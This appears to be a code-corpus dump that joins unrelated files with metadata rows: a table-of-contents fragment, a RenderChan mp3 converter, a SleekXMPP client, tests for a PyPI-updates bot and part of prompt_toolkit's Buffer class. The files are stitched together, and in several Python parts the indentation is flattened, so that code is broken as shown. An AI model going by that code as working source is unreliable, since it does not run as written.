# right col style is right aligned
rightColStyle = ParagraphStyle(
name='leftColLevel%d' % left_col_level,
parent=leftColStyle,
leftIndent=0,
alignment=TA_RIGHT,
)
leftPara = Paragraph(text, leftColStyle)
rightPara = Paragraph(pre + str(pageNum) + post, rightColStyle)
tableData.append([leftPara, rightPara])
self._table = Table(tableData, colWidths=widths, style=self.tableStyle)
self.width, self.height = self._table.wrapOn(self.canv, availWidth, availHeight)
return self.width, self.height
def split(self, aW, aH):
# Make sure _table exists before splitting.
        # This was only triggered in rare cases using Sphinx.
if not self._table:
self.wrap(aW, aH)
return TableOfContents.split(self, aW, aH)
def isSatisfied(self):
if self._entries == self._lastEntries:
log.debug('Table Of Contents is stable')
return True
else:
if len(self._entries) != len(self._lastEntries):
log.info(
'Number of items in TOC changed '
'from %d to %d, not satisfied'
% (len(self._lastEntries), len(self._entries))
)
return False
log.info('TOC entries that moved in this pass:')
for i in range(len(self._entries)):
if self._entries[i] != self._lastEntries[i]:
log.info(str(self._entries[i]))
log.info(str(self._lastEntries[i]))
return False
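# Hedged note (driver loop assumed; it lives in the calling doctemplate):
# ReportLab-style multi-pass builds keep regenerating the story while
# isSatisfied() returns False, roughly
#     while not toc.isSatisfied():
#         doc.build(copy(story))   # notify() repopulates entries each pass
# so the TOC page numbers converge once no entry moves between passes.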
|
mit
| 4,092,100,191,561,448,400
| 33.077739
| 91
| 0.495697
| false
| 4.132405
| false
| false
| false
|
scribblemaniac/RenderChan
|
renderchan/contrib/mp3.py
|
1
|
2027
|
__author__ = 'Konstantin Dmitriev'
from renderchan.module import RenderChanModule
from renderchan.utils import which
import subprocess
import os
import re
import random
class RenderChanMp3Module(RenderChanModule):
def __init__(self):
RenderChanModule.__init__(self)
if os.name == 'nt':
self.conf['binary']=os.path.join(os.path.dirname(__file__),"..\\..\\..\\packages\\mpg123\\mpg123.exe")
self.conf['sox_binary']=os.path.join(os.path.dirname(__file__),"..\\..\\..\\packages\\sox\\sox.exe")
else:
self.conf['binary']="mpg123"
self.conf['sox_binary']="sox"
self.conf["packetSize"]=0
def getInputFormats(self):
return ["mp3"]
def getOutputFormats(self):
return ["wav"]
def checkRequirements(self):
        if which(self.conf['binary']) is None:
self.active=False
print("Module warning (%s): Cannot find '%s' executable." % (self.getName(), self.conf['binary']))
print(" Please install mpg123 package.")
return False
        if which(self.conf['sox_binary']) is None:
self.active=False
print("Module warning (%s): Cannot find '%s' executable!" % (self.getName(), self.conf['sox_binary']))
print(" Please install sox package.")
return False
self.active=True
return True
def render(self, filename, outputPath, startFrame, endFrame, format, updateCompletion, extraParams={}):
comp = 0.0
updateCompletion(comp)
random_string = "%08d" % (random.randint(0,99999999))
tmpfile=outputPath+"."+random_string
# TODO: Progress callback
commandline=[self.conf['binary'], "-w", tmpfile, filename]
subprocess.check_call(commandline)
commandline=[self.conf['sox_binary'], tmpfile, outputPath, "rate", "-v", extraParams["audio_rate"]]
subprocess.check_call(commandline)
os.remove(tmpfile)
updateCompletion(1.0)
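# Hedged usage sketch (call signature taken from render() above):
#     m = RenderChanMp3Module()
#     if m.checkRequirements():
#         m.render("in.mp3", "out.wav", 0, 0, "wav",
#                  lambda p: None, {"audio_rate": "44100"})
# mpg123 decodes the mp3 into a temporary wav next to the output, then sox
# resamples it ("rate -v <audio_rate>") into place and the temp file is
# removed.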
|
bsd-3-clause
| -5,324,836,554,297,819,000
| 32.229508
| 114
| 0.601381
| false
| 3.839015
| false
| false
| false
|
flosse/hello-xmpp
|
python/sleekxmpp/client.py
|
1
|
1260
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import logging
import sleekxmpp
# Python versions before 3.0 do not use UTF-8 encoding
# by default. To ensure that Unicode is handled properly
# throughout SleekXMPP, we will set the default encoding
# ourselves to UTF-8.
if sys.version_info < (3, 0):
from sleekxmpp.util.misc_ops import setdefaultencoding
setdefaultencoding('utf8')
else:
raw_input = input
if __name__ == '__main__':
# check arguments
if len(sys.argv) < 5:
print("Usage: python client.py <my-jid> <my-password> <my-text> <jid1>")
sys.exit(1)
# Setup logging.
logging.basicConfig(level="DEBUG", format='%(levelname)-8s %(message)s')
to = sys.argv[4]
msg = sys.argv[3]
# create a new xmpp client
xmpp = sleekxmpp.ClientXMPP(sys.argv[1], sys.argv[2])
# define a handler function
def onStart(ev):
print("connected")
xmpp.send_message(mto=to, mbody=msg, mtype='chat')
xmpp.disconnect(wait=True)
# add the function
xmpp.add_event_handler("session_start", onStart)
# connect to the XMPP server
if xmpp.connect():
xmpp.process(block=True)
print("Disconnected")
else:
print("Unable to connect.")
|
mit
| -9,118,855,012,749,246,000
| 25.25
| 80
| 0.642063
| false
| 3.342175
| false
| false
| false
|
tell-k/pypi-updates
|
tests/test_bot.py
|
1
|
11603
|
# -*- coding: utf-8 -*-
"""
unit test for PypiUpdatesBot
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:author: tell-k <ffk2005@gmail.com>
:copyright: tell-k. All Rights Reserved.
"""
import mock
import pytest
import logbook
class DummyMemcache(object):
def __init__(self):
self._data = {}
def set(self, key, value):
self._data.update({key: value})
def get(self, key):
return self._data.get(key)
class DummyTweepyAPI(object):
def update_status(self, message):
pass
class TestPypiUpdatesBot(object):
def _get_target_class(self):
from pypi_updates import PypiUpdatesBot
return PypiUpdatesBot
def _make_one(self, *args, **kwargs):
return self._get_target_class()(*args, **kwargs)
def test_tweepy_api(self):
target_obj = self._make_one()
assert target_obj.tweepy_api is not None
# same instance check
assert target_obj.tweepy_api is target_obj.tweepy_api
@mock.patch('pypi_updates.bot.pylibmc.Client',
return_value=DummyMemcache())
def test_memcache(self, mock_memcache):
target_obj = self._make_one()
assert target_obj.memcache is not None
# same instance check
assert target_obj.memcache is target_obj.memcache
@mock.patch('pypi_updates.bot.feedparser.parse', return_value=None)
    def test_cannot_parse_feed(self, mock):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
with logbook.TestHandler() as log_handler:
update_status(target_obj)
expected = [
'[WARNING] [kuroko user]: Cannot parse RSS: {}'.format(RSS_URL)
]
assert log_handler.formatted_records == expected
mock.assert_called_with(RSS_URL)
@mock.patch('pypi_updates.bot.feedparser.parse',
return_value={'items': []})
    def test_cannot_parse_items(self, mock):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
with logbook.TestHandler() as log_handler:
update_status(target_obj)
assert log_handler.formatted_records == [
'[WARNING] [kuroko user]: Cannot parse RSS: {}'.format(RSS_URL)
]
mock.assert_called_with(RSS_URL)
@mock.patch('pypi_updates.bot.pylibmc.Client', return_value=DummyMemcache())
@mock.patch('pypi_updates.bot.tweepy.API', return_value=DummyTweepyAPI())
def test_update_status(self, mock_memcache, mock_tweepy):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'dummy',
'link': 'http://example.com/1/',
'description': 'dummydesc',
'published': '09 Oct 2014 15:31:26 GMT'
},
{
'title': 'dummy2',
'link': 'http://example.com/2/',
'description': 'dummydesc2',
'published': '09 Oct 2014 15:18:59 GMT'
},
]
}
m_parse = mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed)
with logbook.TestHandler() as log_handler, m_parse as m:
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009151858',
u'[INFO] [kuroko user]: dummy http://example.com/1/',
u'[INFO] [kuroko user]: dummy2 http://example.com/2/',
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
@mock.patch('pypi_updates.bot.tweepy.API', return_value=DummyTweepyAPI())
def test_already_set_latest_published(self, mock_tweepy):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'dummy',
'link': 'http://example.com/1/',
'description': 'dummydesc',
'published': '09 Oct 2014 15:31:26 GMT'
},
{
'title': 'dummy2',
'link': 'http://example.com/2/',
'description': 'dummydesc2',
'published': '09 Oct 2014 15:18:59 GMT'
},
]
}
dummy_memcache = DummyMemcache()
dummy_memcache.set('latest_published', '20141009151859')
with logbook.TestHandler() as log_handler,\
mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed) as m,\
mock.patch('pypi_updates.bot.pylibmc.Client',
return_value=dummy_memcache):
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009151859',
u'[INFO] [kuroko user]: dummy http://example.com/1/',
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
def test_skip_old_tweet(self):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'dummy',
'link': 'http://example.com/1/',
'description': 'dummydesc',
'published': '09 Oct 2014 15:31:26 GMT'
},
]
}
dummy_memcache = DummyMemcache()
dummy_memcache.set('latest_published', '20141009153126')
with logbook.TestHandler() as log_handler,\
mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed) as m,\
mock.patch('pypi_updates.bot.pylibmc.Client',
return_value=dummy_memcache):
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009153126',
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
@mock.patch('pypi_updates.bot.pylibmc.Client', return_value=DummyMemcache())
@mock.patch('pypi_updates.bot.tweepy.API', return_value=DummyTweepyAPI())
def test_tweet_over_length(self, mock_memcache, mock_tweepy):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'a' * 109, # truncate
'link': 'http://example.com/1/',
'description': 'a' * 126, # truncate
'published': '09 Oct 2014 15:31:26 GMT'
},
{
'title': 'a' * 108, # not truncate
'link': 'http://example.com/2/',
'description': 'a' * 125, # not truncate
'published': '09 Oct 2014 15:18:59 GMT'
},
]
}
with logbook.TestHandler() as log_handler,\
mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed) as m:
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009151858',
u'[INFO] [kuroko user]: {}... http://example.com/1/'.format(u'a' * 105),
u'[INFO] [kuroko user]: {} http://example.com/2/'.format(u'a' * 108),
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
@mock.patch('pypi_updates.bot.pylibmc.Client', return_value=DummyMemcache())
def test_raise_tweepy_error(self, mock_memcache):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': 'dummy',
'link': 'http://example.com/1/',
'description': 'dummydesc',
'published': '09 Oct 2014 15:31:26 GMT'
},
]
}
def _update_status_error(message):
import tweepy
raise tweepy.TweepError(reason='error')
dummy_tweepy_api = DummyTweepyAPI()
dummy_tweepy_api.update_status = _update_status_error
with logbook.TestHandler() as log_handler,\
mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed) as m,\
mock.patch('pypi_updates.bot.tweepy.API',
return_value=dummy_tweepy_api):
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009153125',
u'[INFO] [kuroko user]: dummy http://example.com/1/',
u'[ERROR] [kuroko user]: error'
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153125'
@mock.patch('pypi_updates.bot.pylibmc.Client',
return_value=DummyMemcache())
@mock.patch('pypi_updates.bot.tweepy.API', return_value=DummyTweepyAPI())
def test_multibyte_language(self, mock_memcache, mock_tweepy):
from pypi_updates.bot import RSS_URL
target_obj = self._make_one()
update_status = target_obj.funcs[0]['options']['callback']
dummy_feed = {
'items': [
{
'title': u'是假的數據',
'link': 'http://example.com/1/',
'description': u'是假的數據',
'published': '09 Oct 2014 15:31:26 GMT'
},
]
}
m_parse = mock.patch('pypi_updates.bot.feedparser.parse',
return_value=dummy_feed)
with logbook.TestHandler() as log_handler, m_parse as m:
update_status(target_obj)
assert log_handler.formatted_records == [
u'[INFO] [kuroko user]: latest_published => 20141009153125',
u'[INFO] [kuroko user]: 是假的數據 http://example.com/1/',
]
m.assert_called_with(RSS_URL)
assert target_obj.memcache.get('latest_published') == '20141009153126'
class TestIsValidMessage(object):
def _call_fut(self, msg):
from pypi_updates.bot import is_valid_message
return is_valid_message(msg)
@pytest.mark.parametrize('msg', [
'new pypi packages',
])
def test_valid_case(self, msg):
assert self._call_fut(msg)
@pytest.mark.parametrize('msg', [
'kissanime',
'new kissanime',
])
def test_invalid_case(self, msg):
assert not self._call_fut(msg)
|
mit
| 1,637,907,340,961,301,500
| 34.719136
| 84
| 0.536421
| false
| 3.818212
| true
| false
| false
|
ALSchwalm/python-prompt-toolkit
|
prompt_toolkit/buffer.py
|
1
|
40824
|
"""
Data structures for the Buffer.
It holds the text, cursor position, history, etc...
"""
from __future__ import unicode_literals
from .completion import Completer, Completion, CompleteEvent
from .document import Document
from .enums import IncrementalSearchDirection
from .history import History, InMemoryHistory
from .selection import SelectionType, SelectionState
from .utils import Callback
from .validation import ValidationError
from .clipboard import ClipboardData
from .filters import Never, to_simple_filter
from .search_state import SearchState
import os
import six
import subprocess
import tempfile
__all__ = (
'EditReadOnlyBuffer',
'AcceptAction',
'Buffer',
'indent',
'unindent',
)
class EditReadOnlyBuffer(Exception):
" Attempt editing of read-only buffer. "
class AcceptAction(object):
"""
What to do when the input is accepted by the user.
(When Enter was pressed in the command line.)
:param handler: (optional) A callable which accepts a CLI and `Document'
that is called when the user accepts input.
:param render_cli_done: When using a handler, first render the CLI in the
        'done' state, then call the handler. If False, the interface is
        erased before the handler runs.
    """
def __init__(self, handler=None):
assert handler is None or callable(handler)
self.handler = handler
@classmethod
def run_in_terminal(cls, handler, render_cli_done=False):
"""
Create an `AcceptAction` that runs the given handler in the terminal.
:param render_cli_done: When True, render the interface in the 'Done'
state first, then execute the function. If False, erase the
interface instead.
"""
def _handler(cli, buffer):
cli.run_in_terminal(lambda: handler(cli, buffer), render_cli_done=render_cli_done)
return AcceptAction(handler=_handler)
@property
def is_returnable(self):
"""
True when there is something handling accept.
"""
return bool(self.handler)
def validate_and_handle(self, cli, buffer):
"""
Validate buffer and handle the accept action.
"""
if buffer.validate():
if self.handler:
self.handler(cli, buffer)
buffer.append_to_history()
def _return_document_handler(cli, buffer):
cli.set_return_value(buffer.document)
AcceptAction.RETURN_DOCUMENT = AcceptAction(_return_document_handler)
AcceptAction.IGNORE = AcceptAction(handler=None)
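# Hedged usage sketch (handler body assumed): printing the accepted input
# outside of the alternate screen via run_in_terminal:
#     def _print_handler(cli, buffer):
#         print(buffer.text)
#     accept = AcceptAction.run_in_terminal(_print_handler)
# The resulting object can be passed as Buffer(accept_action=...) below.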
class CompletionState(object):
"""
Immutable class that contains a completion state.
"""
def __init__(self, original_document, current_completions=None, complete_index=None):
#: Document as it was when the completion started.
self.original_document = original_document
#: List of all the current Completion instances which are possible at
#: this point.
self.current_completions = current_completions or []
#: Position in the `current_completions` array.
#: This can be `None` to indicate "no completion", the original text.
        self.complete_index = complete_index
def __repr__(self):
return '%s(%r, <%r> completions, index=%r)' % (
self.__class__.__name__,
self.original_document, len(self.current_completions), self.complete_index)
def go_to_index(self, index):
"""
Create a new CompletionState object with the new index.
"""
return CompletionState(self.original_document, self.current_completions, complete_index=index)
def new_text_and_position(self):
"""
Return (new_text, new_cursor_position) for this completion.
"""
if self.complete_index is None:
return self.original_document.text, self.original_document.cursor_position
else:
original_text_before_cursor = self.original_document.text_before_cursor
original_text_after_cursor = self.original_document.text_after_cursor
c = self.current_completions[self.complete_index]
if c.start_position == 0:
before = original_text_before_cursor
else:
before = original_text_before_cursor[:c.start_position]
new_text = before + c.text + original_text_after_cursor
new_cursor_position = len(before) + len(c.text)
return new_text, new_cursor_position
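    # Worked example (illustrative values): original text 'im' with the
    # cursor at the end plus Completion(text='import', start_position=-2)
    # gives before == '', so new_text == 'import' and
    # new_cursor_position == 6; text after the cursor is always preserved.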
@property
def current_completion(self):
"""
Return the current completion, or return `None` when no completion is
selected.
"""
if self.complete_index is not None:
return self.current_completions[self.complete_index]
class Buffer(object):
"""
The core data structure that holds the text and cursor position of the
    current input line and implements all text manipulations on top of it. It
    also implements the history, undo stack and the completion state.
    :attr completer: :class:`~prompt_toolkit.completion.Completer` instance.
:attr history: :class:`~prompt_toolkit.history.History` instance.
:attr callbacks: :class:`~.Callbacks` instance.
:attr tempfile_suffix: Suffix to be appended to the tempfile for the 'open
in editor' function.
:attr is_multiline: SimpleFilter to indicate whether we should consider
this buffer a multiline input. If so, key bindings can
decide to insert newlines when pressing [Enter].
(Instead of accepting the input.)
:param complete_while_typing: Filter instance. Decide whether or not to do
asynchronous autocompleting while typing.
:param on_text_changed: Callback instance or None.
:param on_text_insert: Callback instance or None.
:param on_cursor_position_changed: Callback instance or None.
:param enable_history_search: SimpleFilter to indicate when up-arrow partial
        string matching is enabled. It is advised not to enable this at the
same time as `complete_while_typing`, because when there is an
autocompletion found, the up arrows usually browse through the
completions, rather than through the history.
"""
def __init__(self, completer=None, history=None, validator=None, tempfile_suffix='',
is_multiline=Never(), complete_while_typing=Never(),
enable_history_search=Never(), initial_document=None,
accept_action=AcceptAction.RETURN_DOCUMENT, read_only=False,
on_text_changed=None, on_text_insert=None, on_cursor_position_changed=None):
# Accept both filters and booleans as input.
enable_history_search = to_simple_filter(enable_history_search)
is_multiline = to_simple_filter(is_multiline)
complete_while_typing = to_simple_filter(complete_while_typing)
read_only = to_simple_filter(read_only)
# Validate input.
assert completer is None or isinstance(completer, Completer)
assert history is None or isinstance(history, History)
assert on_text_changed is None or isinstance(on_text_changed, Callback)
assert on_text_insert is None or isinstance(on_text_insert, Callback)
assert on_cursor_position_changed is None or isinstance(on_cursor_position_changed, Callback)
self.completer = completer
self.validator = validator
self.tempfile_suffix = tempfile_suffix
self.accept_action = accept_action
# Filters. (Usually, used by the key bindings to drive the buffer.)
self.is_multiline = is_multiline
self.complete_while_typing = complete_while_typing
self.enable_history_search = enable_history_search
self.read_only = read_only
#: The command buffer history.
# Note that we shouldn't use a lazy 'or' here. bool(history) could be
# False when empty.
self.history = InMemoryHistory() if history is None else history
self.__cursor_position = 0
# Events
self.on_text_changed = on_text_changed or Callback()
self.on_text_insert = on_text_insert or Callback()
self.on_cursor_position_changed = on_cursor_position_changed or Callback()
self.reset(initial_document=initial_document)
def reset(self, initial_document=None, append_to_history=False):
"""
:param append_to_history: Append current input to history first.
"""
assert initial_document is None or isinstance(initial_document, Document)
if append_to_history:
self.append_to_history()
initial_document = initial_document or Document()
self.__cursor_position = initial_document.cursor_position
# `ValidationError` instance. (Will be set when the input is wrong.)
self.validation_error = None
# State of the selection.
self.selection_state = None
# State of complete browser
self.complete_state = None # For interactive completion through Ctrl-N/Ctrl-P.
# The history search text. (Used for filtering the history when we
# browse through it.)
self.history_search_text = None
# Undo/redo stacks
self._undo_stack = [] # Stack of (text, cursor_position)
self._redo_stack = []
#: The working lines. Similar to history, except that this can be
#: modified. The user can press arrow_up and edit previous entries.
#: Ctrl-C should reset this, and copy the whole history back in here.
#: Enter should process the current command and append to the real
#: history.
self._working_lines = self.history.strings[:]
self._working_lines.append(initial_document.text)
self.__working_index = len(self._working_lines) - 1
# <getters/setters>
def _set_text(self, value):
""" set text at current working_index. Return whether it changed. """
original_value = self._working_lines[self.working_index]
self._working_lines[self.working_index] = value
return value != original_value
def _set_cursor_position(self, value):
""" Set cursor position. Return whether it changed. """
original_position = self.__cursor_position
self.__cursor_position = max(0, value)
return value != original_position
@property
def text(self):
return self._working_lines[self.working_index]
@text.setter
def text(self, value):
"""
Setting text. (When doing this, make sure that the cursor_position is
valid for this text. text/cursor_position should be consistent at any time,
otherwise set a Document instead.)
"""
assert isinstance(value, six.text_type), 'Got %r' % value
assert self.cursor_position <= len(value)
# Don't allow editing of read-only buffers.
if self.read_only():
raise EditReadOnlyBuffer()
changed = self._set_text(value)
if changed:
self._text_changed()
# Reset history search text.
self.history_search_text = None
@property
def cursor_position(self):
return self.__cursor_position
@cursor_position.setter
def cursor_position(self, value):
"""
Setting cursor position.
"""
assert isinstance(value, int)
assert value <= len(self.text)
changed = self._set_cursor_position(value)
if changed:
self._cursor_position_changed()
@property
def working_index(self):
return self.__working_index
@working_index.setter
def working_index(self, value):
if self.__working_index != value:
self.__working_index = value
self._text_changed()
def _text_changed(self):
# Remove any validation errors and complete state.
self.validation_error = None
self.complete_state = None
self.selection_state = None
# fire 'on_text_changed' event.
self.on_text_changed.fire()
def _cursor_position_changed(self):
# Remove any validation errors and complete state.
self.validation_error = None
self.complete_state = None
# Note that the cursor position can change if we have a selection the
# new position of the cursor determines the end of the selection.
# fire 'on_cursor_position_changed' event.
self.on_cursor_position_changed.fire()
@property
def document(self):
"""
Return :class:`Document` instance from the current text and cursor
position.
"""
return Document(self.text, self.cursor_position, selection=self.selection_state)
@document.setter
def document(self, value):
"""
Set :class:`Document` instance.
This will set both the text and cursor position at the same time, but
atomically. (Change events will be triggered only after both have been set.)
"""
assert isinstance(value, Document)
# Don't allow editing of read-only buffers.
if self.read_only():
raise EditReadOnlyBuffer()
# Set text and cursor position first.
text_changed = self._set_text(value.text)
cursor_position_changed = self._set_cursor_position(value.cursor_position)
# Now handle change events. (We do this when text/cursor position is
# both set and consistent.)
if text_changed:
self._text_changed()
if cursor_position_changed:
self._cursor_position_changed()
# End of <getters/setters>
def save_to_undo_stack(self, clear_redo_stack=True):
"""
        Save current state (input text and cursor position), so that we can
        restore it by calling undo.
        """
        # Save only if the text at the top of the stack is different from
        # the current text. If the text is the same, just update the cursor
        # position.
if self._undo_stack and self._undo_stack[-1][0] == self.text:
self._undo_stack[-1] = (self._undo_stack[-1][0], self.cursor_position)
else:
self._undo_stack.append((self.text, self.cursor_position))
# Saving anything to the undo stack, clears the redo stack.
if clear_redo_stack:
self._redo_stack = []
def transform_lines(self, line_index_iterator, transform_callback):
"""
Transforms the text on a range of lines.
        When the iterator yields an index not in the range of lines that the
document contains, it skips them silently.
To uppercase some lines::
new_text = transform_lines(range(5,10), lambda text: text.upper())
:param line_index_iterator: Iterator of line numbers (int)
:param transform_callback: callable that takes the original text of a
line, and return the new text for this line.
:returns: The new text.
"""
# Split lines
lines = self.text.split('\n')
# Apply transformation
for index in line_index_iterator:
try:
lines[index] = transform_callback(lines[index])
except IndexError:
pass
return '\n'.join(lines)
def transform_region(self, from_, to, transform_callback):
"""
Transform a part of the input string.
        :param from_: (int) start position.
        :param to: (int) end position.
        :param transform_callback: Callable which accepts a string and returns
the transformed string.
"""
assert from_ < to
        self.text = (
            self.text[:from_] +
            transform_callback(self.text[from_:to]) +
            self.text[to:]
        )
def cursor_left(self, count=1):
self.cursor_position += self.document.get_cursor_left_position(count=count)
def cursor_right(self, count=1):
self.cursor_position += self.document.get_cursor_right_position(count=count)
def cursor_up(self, count=1):
""" (for multiline edit). Move cursor to the previous line. """
self.cursor_position += self.document.get_cursor_up_position(count=count)
def cursor_down(self, count=1):
""" (for multiline edit). Move cursor to the next line. """
self.cursor_position += self.document.get_cursor_down_position(count=count)
def auto_up(self, count=1):
"""
If we're not on the first line (of a multiline input) go a line up,
otherwise go back in history. (If nothing is selected.)
"""
if self.complete_state:
self.complete_previous(count=count)
elif self.document.cursor_position_row > 0:
self.cursor_position += self.document.get_cursor_up_position(count=count)
elif not self.selection_state:
self.history_backward(count=count)
def auto_down(self, count=1):
"""
If we're not on the last line (of a multiline input) go a line down,
otherwise go forward in history. (If nothing is selected.)
"""
if self.complete_state:
self.complete_next(count=count)
elif self.document.cursor_position_row < self.document.line_count - 1:
self.cursor_position += self.document.get_cursor_down_position(count=count)
elif not self.selection_state:
self.history_forward(count=count)
def delete_before_cursor(self, count=1):
"""
Delete character before cursor, return deleted character.
"""
assert count >= 0
deleted = ''
if self.cursor_position > 0:
deleted = self.text[self.cursor_position - count:self.cursor_position]
new_text = self.text[:self.cursor_position - count] + self.text[self.cursor_position:]
new_cursor_position = self.cursor_position - len(deleted)
# Set new Document atomically.
self.document = Document(new_text, new_cursor_position)
return deleted
def delete(self, count=1):
"""
Delete one character. Return deleted character.
"""
if self.cursor_position < len(self.text):
deleted = self.document.text_after_cursor[:count]
self.text = self.text[:self.cursor_position] + \
self.text[self.cursor_position + len(deleted):]
return deleted
else:
return ''
def join_next_line(self):
"""
Join the next line to the current one by deleting the line ending after
the current line.
"""
if not self.document.on_last_line:
self.cursor_position += self.document.get_end_of_line_position()
self.delete()
# Remove spaces.
self.text = (self.document.text_before_cursor + ' ' +
self.document.text_after_cursor.lstrip(' '))
def join_selected_lines(self):
"""
Join the selected lines.
"""
assert self.selection_state
# Get lines.
from_, to = self.document.selection_range()
before = self.text[:from_]
lines = self.text[from_:to].splitlines()
after = self.text[to:]
# Replace leading spaces with just one space.
lines = [l.lstrip(' ') + ' ' for l in lines]
# Set new document.
self.document = Document(text=before + ''.join(lines) + after,
cursor_position=len(before + ''.join(lines[:-1])) - 1)
def swap_characters_before_cursor(self):
"""
Swap the last two characters before the cursor.
"""
pos = self.cursor_position
if pos >= 2:
a = self.text[pos - 2]
b = self.text[pos - 1]
self.text = self.text[:pos-2] + b + a + self.text[pos:]
def go_to_history(self, index):
"""
Go to this item in the history.
"""
if index < len(self._working_lines):
self.working_index = index
self.cursor_position = len(self.text)
def complete_next(self, count=1):
"""
Browse to the next completions.
(Does nothing if there are no completion.)
"""
if self.complete_state:
completions_count = len(self.complete_state.current_completions)
if self.complete_state.complete_index is None:
index = 0
elif self.complete_state.complete_index == completions_count - 1:
index = None
else:
index = min(completions_count-1, self.complete_state.complete_index + count)
self._go_to_completion(index)
def complete_previous(self, count=1):
"""
Browse to the previous completions.
(Does nothing if there are no completion.)
"""
if self.complete_state:
if self.complete_state.complete_index == 0:
index = None
elif self.complete_state.complete_index is None:
index = len(self.complete_state.current_completions) - 1
else:
index = max(0, self.complete_state.complete_index - count)
self._go_to_completion(index)
def cancel_completion(self):
"""
Cancel completion, go back to the original text.
"""
if self.complete_state:
self._go_to_completion(None)
self.complete_state = None
def set_completions(self, completions, go_to_first=True, go_to_last=False):
"""
Start completions. (Generate list of completions and initialize.)
"""
assert not (go_to_first and go_to_last)
# Generate list of all completions.
if completions is None:
if self.completer:
completions = list(self.completer.get_completions(
self.document,
CompleteEvent(completion_requested=True)
))
else:
completions = []
# Set `complete_state`.
if completions:
self.complete_state = CompletionState(
original_document=self.document,
current_completions=completions)
if go_to_first:
self._go_to_completion(0)
elif go_to_last:
self._go_to_completion(len(completions) - 1)
else:
self._go_to_completion(None)
else:
self.complete_state = None
def start_history_lines_completion(self):
"""
Start a completion based on all the other lines in the document and the
history.
"""
found_completions = set()
completions = []
# For every line of the whole history, find matches with the current line.
current_line = self.document.current_line_before_cursor.lstrip()
for i, string in enumerate(self._working_lines):
for j, l in enumerate(string.split('\n')):
l = l.strip()
if l and l.startswith(current_line):
# When a new line has been found.
if l not in found_completions:
found_completions.add(l)
# Create completion.
if i == self.working_index:
display_meta = "Current, line %s" % (j+1)
else:
display_meta = "History %s, line %s" % (i+1, j+1)
completions.append(Completion(
l,
start_position=-len(current_line),
display_meta=display_meta))
self.set_completions(completions=completions[::-1])
def _go_to_completion(self, index):
"""
Select a completion from the list of current completions.
"""
assert self.complete_state
# Set new completion
state = self.complete_state.go_to_index(index)
# Set text/cursor position
new_text, new_cursor_position = state.new_text_and_position()
self.document = Document(new_text, new_cursor_position)
# (changing text/cursor position will unset complete_state.)
self.complete_state = state
def _set_history_search(self):
""" Set `history_search_text`. """
if self.enable_history_search():
if self.history_search_text is None:
self.history_search_text = self.text
else:
self.history_search_text = None
def _history_matches(self, i):
"""
True when the current entry matches the history search.
(when we don't have history search, it's also True.)
"""
return (self.history_search_text is None or
self._working_lines[i].startswith(self.history_search_text))
def history_forward(self, count=1):
"""
Move forwards through the history.
:param count: Amount of items to move forward.
        When history search is enabled, only entries starting with
        `history_search_text` are considered.
"""
self._set_history_search()
# Go forward in history.
found_something = False
for i in range(self.working_index + 1, len(self._working_lines)):
if self._history_matches(i):
self.working_index = i
count -= 1
found_something = True
if count == 0:
break
# If we found an entry, move cursor to the end of the first line.
if found_something:
self.cursor_position = 0
self.cursor_position += self.document.get_end_of_line_position()
def history_backward(self, count=1):
"""
Move backwards through history.
"""
self._set_history_search()
# Go back in history.
found_something = False
for i in range(self.working_index - 1, -1, -1):
if self._history_matches(i):
self.working_index = i
count -= 1
found_something = True
if count == 0:
break
# If we move to another entry, move cursor to the end of the line.
if found_something:
self.cursor_position = len(self.text)
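    # Illustrative flow (sample history assumed): with working lines
    # ['git status', 'ls', 'git log', 'git'] and history search enabled for
    # the typed prefix 'git', the first history_backward() call lands on
    # 'git log'; the next call skips 'ls' via _history_matches() and lands
    # on 'git status', with the cursor placed at the end of the text.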
def start_selection(self, selection_type=SelectionType.CHARACTERS):
"""
Take the current cursor position as the start of this selection.
"""
self.selection_state = SelectionState(self.cursor_position, selection_type)
def copy_selection(self, _cut=False):
"""
Copy selected text and return :class:`ClipboardData` instance.
"""
if self.selection_state:
type = self.selection_state.type
# Take start and end of selection
from_, to = self.document.selection_range()
copied_text = self.text[from_:to]
# If cutting, remove the text and set the new cursor position.
if _cut:
self.document = Document(text=self.text[:from_] + self.text[to + 1:],
cursor_position=min(from_, to))
self.selection_state = None
return ClipboardData(copied_text, type)
else:
return ClipboardData('')
def cut_selection(self):
"""
